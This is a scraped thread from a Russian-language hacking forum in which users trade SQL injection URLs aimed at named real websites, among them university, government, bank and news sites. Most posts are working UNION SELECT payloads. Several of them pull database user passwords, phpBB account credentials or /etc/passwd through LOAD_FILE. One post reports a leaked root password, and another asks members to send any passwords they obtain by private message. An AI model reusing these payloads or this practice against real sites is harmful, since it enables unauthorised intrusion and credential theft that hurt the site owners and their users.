SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    http://www.mmcc.ru/events.php?id=1+union+select+1,concat(user,char(58),password)+from+mysql.user/*

    х.з почему пасс не выводится...может его нет))

    http://www.mmcc.ru/events.php?id=1+union+select+1,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100))+from+mysql.user/*
     
    1 person likes this.
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    .EDU домены =)
    Кто докопается до паролей и тд прошу писать в ПМ
    бывает..
     
    1 person likes this.
  3. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    http://kuda.nordiz.ru/tovar.php?tovar_id=-1%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54+from+phpbb_users/*
     
    4 people like this.
  4. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ____
     
  5. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    HTML:
    http://www.formicarium.pl/open.php?p=artykuly&dzial=-1+UNION+SELECt+database(),2/*
    http://www.formicarium.pl/open.php?p=artykuly&dzial=1&art=-1+UNION+SELECt+database(),USER(),version()/*
    http://www.formicarium.pl/open.php?p=artykuly+union+select+1/*
     
    1 person likes this.
  6. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    http://www.flirtanica.ru/articles1.php?id=-1+union+select+1,2,3,4,5/*
    http://www.fcdynamo.ru/material.php?id=642'+union+select+1,2,3,4,5,6,7,8/*
    http://vostokmedia.com/news.details.php?id=-2+or+1=1/*
    http://www.pvd.gov.lv/index.php?id=-2+or+1=1/*
    http://www.mpa.ru/cis/country.php?id=-1+union+select+database(),system_user(),version()/*
    http://www.keckobservatory.org/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
    http://www.etnosfera.ru/ecentr.php?id=-2+or+1=1/*
     
    1 person likes this.
  7. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    http://www.dynamomania.com/comment.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
    было пять минут тока, во...
     
  8. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.islam.ru/shop/index.php?sample=771&good=98&cat=-1+union+select+1,2,3,4,concat(password,char(58),id,CHAR(194,206,210,32,194,219,194,206,196,33))+from+users+limit+0,1/*
    Без пробелов!
     
    1 person likes this.
  9. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    Я доделал...
    http://www.dynamomania.com/comment.php?id=-1+union+select+1,2,Pwd,name,5,email,7,8+from+users+limit+0,1/*
     
  10. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    h..p://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,user(),6,version(),password,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+mysql.user/*
     
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    не надо в 3 отдельных поста все это (m0nzt3r)
     
    #331 Spyder, 27 Jan 2007
    Last edited by a moderator: 27 Jan 2007
    1 person likes this.
  12. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Code:
    http://www.m-study.ru/courses/descr/?news_id=-60+union+select+1111,22222,33333/*
    смотрим топ, там вывод)
     
  13. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    ==
     
    _________________________
    1 person likes this.
  14. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://websib.ru/new_detail.php?new_id=-1+union+select+1,password,user+from+mysql.user/*
     
  15. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    http://www.museum.sakha.ru/forum.php?f=1+union+select+1,2,3,4,5,convert(versi on()+using+cp1251),concat(convert(password+using+c p1251),char(58),convert(user+using+cp1251)),8,9,10 +from+mysql.user/*

    _http://ul-online.ru/modules/job/vacancy.php?id=7+union+select+1,concat(user,char(5 8),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23+from+mysql.user/*

    вывод из БД root:JF5555o

    _http://ul-online.ru/modules/job/vacancy.php?id=7+union+select+1,concat(user_id,cha r(58),username,char(58),user_password,char(58),use r_email),3,4,5,6,7,8,9,10,11,LOAD_FILE(char(47,101 ,116,99,47,112,97,115,115,119,100)),13,14,15,16,17 ,18,19,20,21,22,23+from+phpbb_users+limit+1,1/*

    вывод инфы из форума...пасс админа расшифровать не удалось :(
     
    #335 злюка, 27 Jan 2007
    Last edited: 7 Mar 2007
    1 person likes this.
  16. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-1+union+select+0x536e406b333a206e75206f6368656e207370617420686f63686563612e2e2e,2/*
    http://www.akihabaranews.com/en/news_details.php?id=-1+union+select+1,2,version(),4/*

    на сон грядущий....


    Парой бывает необходимо перевести "слово" в нужную кодировку, хоть то 16 бит, или char, то вот фича, там ещё полно кодировок:
    http://snak3.h17.ru/tools/
     
    #336 Sn@k3, 28 Jan 2007
    Last edited: 28 Jan 2007
  17. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42

    TbBank
    Code:
    http://www.tbbank.ge/ge_news.php?news_id=-1+union+select+1,2,3,4,5,6/*
    Красноярский городской сайт
    Code:
    http://kgs.ru/news.shtml?title=-1+union+select+1,2,user(),version(),5,6/*
    Game-Ost
    Code:
    http://www.game-ost.ru/articles.php?id=-1+union+select+1,2,3,4,5,6,7/*&action=view
    Rucenturion
    Code:
    http://www.rucenturion.com/view_news.php?news_id=89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
    Flirtanica
    Code:
    http://www.flirtanica.ru/articles1.php?id=-1+union+select+1,2,3,4,5/*
    OBDD
    Code:
    http://www.obdd.ru/news_one.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
     
    3 people like this.
  18. Sp0ok

    Sp0ok New Member

    Joined:
    25 Nov 2006
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://calculatoare.ido.ro/index.php?id=2+union+elect+1,id,user(),4,5,6,7,8,9,10,11+from+articles/*
    _____________________________________________
    Shake if you want-Run if you can't !
     
  19. Sp0ok

    Sp0ok New Member

    Joined:
    25 Nov 2006
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://colombia.indymedia.org/print.php?id=54766 +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 /*
    ____________________________________________
     
  20. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://www.kultura72.ru/guide.php?idlt=26&t_id=35%20union%20select%201,concat(username,char(58),user_password,char(58),char(58),user_email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20phpbb_users/*
    но форум фуфло полное
     
Thread Status:
Not open for further replies.